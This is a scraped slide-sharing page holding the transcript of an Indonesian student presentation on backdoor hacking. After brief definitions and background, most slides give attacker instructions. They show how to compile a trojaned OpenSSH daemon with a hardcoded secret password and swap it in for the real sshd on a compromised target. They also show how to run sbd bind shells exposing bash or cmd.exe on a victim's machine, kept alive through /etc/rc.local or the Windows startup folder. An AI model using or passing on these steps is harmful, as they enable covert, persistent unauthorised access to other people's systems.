1 / 12

Backdoor Hacking

Backdoor Hacking. Amellia Aquariesta (7405.040.001) ‏ Abi Sugeng Ariyanto (7405.040.011) ‏. Apa Itu Backdoor ?.

hisoki
Download Presentation

Backdoor Hacking

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Backdoor Hacking Amellia Aquariesta (7405.040.001)‏ Abi Sugeng Ariyanto (7405.040.011)‏

  2. Apa Itu Backdoor ? • Backdoor atau "pintu belakang", dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya). (Wikipedia)‏

  3. Latar Belakang • Backdoor pada awalnya dibuat oleh para programer komputer sebagai mekanisme yang mengizinkan mereka untuk memperoleh akses khusus ke dalam program mereka, seringnya digunakan untuk membenarkan dan memperbaiki kode di dalam program yang mereka buat ketika sebuah crash akibat bug terjadi.

  4. Latar Belakang • Kenneth Thompson (salah seorang pemrogram sistem operasi UNIX membuat sebuah program proses login pada tahun 1983 ketika memperoleh Turing Award), selain program login umum digunakan dalam sistem operasi UNIX dengan menggunakan bahasa pemrograman C, sehingga ia dapat mengakses sistem UNIX yang berjalan di dalam jaringan internal Bell Labs.

  5. Backdoor dalam Hacker • Backdoor dalam dunia hacker memiliki arti mebuat pintu belakang apabila akan meninggalkan host yang sudah dimasuki. pintu ini berupa password login. Backdoor ini berguna apabila cracker ingin kembali ke host / server tersebut, karena apabila password root atau admin telah diganti, kita masih bisa masuk menggunakan password backdoor yang telah dipasang.

  6. Toolbackdoor • sshbd • sdb

  7. SSHBD • Instalasi sshbd • asumsi ini setelah kita masuk host target. Extrak file sshbd.tgz. Edit file version.h • Ubah password backdoor sesuai keinginan anda dengan melakukan pengeditan pada file includes.h • #define _SECRET_PASSWD "asdfg123" • Setelah semua beres, mulai lakukan installasi misal sebagai berikut : (Hanya SEMISAL SAJA, gunakan kreatifitas anda oke!!)‏ • #define SSH_VERSION "OpenSSH_4.2"

  8. SSHBD • [root@target]#./configure --prefix=/usr/local/sshd/ (Tunggu sampai selesai)‏ • [root@target]#make;make install (Tunggu sampai selesai)‏ • [root@target]#ps -axu|grep /sbin/sshd • Warning: bad ps syntax, perhaps a bogus ‘-’? See http://procps.sf.net/faq.html • root 3380 0.0 0.6 4272 1576 ? Ss 13:15 0:00 /usr/sbin/sshd • root 4903 0.0 0.2 2032 664 pts/5 S+ 16:56 0:00 grep /sbin/sshd • [root@target]#kill -9 3380;mv /usr/sbin/sshd . • [root@target]#cp /usr/local/sshd/sbin/sshd /usr/sbin/sshd • [root@target]#chmod +x /usr/sbin/sshd;kill -HUP `cat /var/run/sshd.pid`

  9. SSHBD • Selesai installasi, sekarang coba anda login dari box anda ke box backdoor dengan • [root@aku]#ssh root@xxx.xxx.xxx.xxx (Ini adalah IP box backdoor)‏ • password : <enter> • blablabla • [root@target]# • Password diatas diisikan password backdoor yang diisikan

  10. SBD di Linux --1 • Membuat backdoor di LINUX • Extract sbd-1.37 (tar –xzvf….)‏ • make unix • ./sdb –l –p <port> -e bash –v –ro –Don • Buat file utk menjalankan backdoor, agar backdoor tetap bisa aktif meskipun komputer korban di restart. Contoh filenya : xx.pl: #!/bin/bash cd /root/backdoor/sbd-1.37/ (tempat sbd-137 diextract)‏ ./sbd -l -p 123 -e bash -Don -v -r0 • copy-kan isi file xx.pl isi ke /etc/rc.local

  11. SBD di Windows --1 • Membuat backdoor di Windows • make cygwin • copy paket sbd.exe • sdb -l -p <nmr port> -e cmd.exe -v -ro • Buat file utk menjalankan backdoor, agar backdoor tetap bisa aktif meskipun komputer korban di restart. Contoh filenya : xx.bat: @echo off cd.. //asumsi paket sbd ada pd C: cd.. sbd -l -p 241 -e cmd.exe -v -ro exit • Taruh file xx.bat di startup

  12. SBD • Menghack lewat Linux dan Windows • sbd –v <ip_korban> <port>

More Related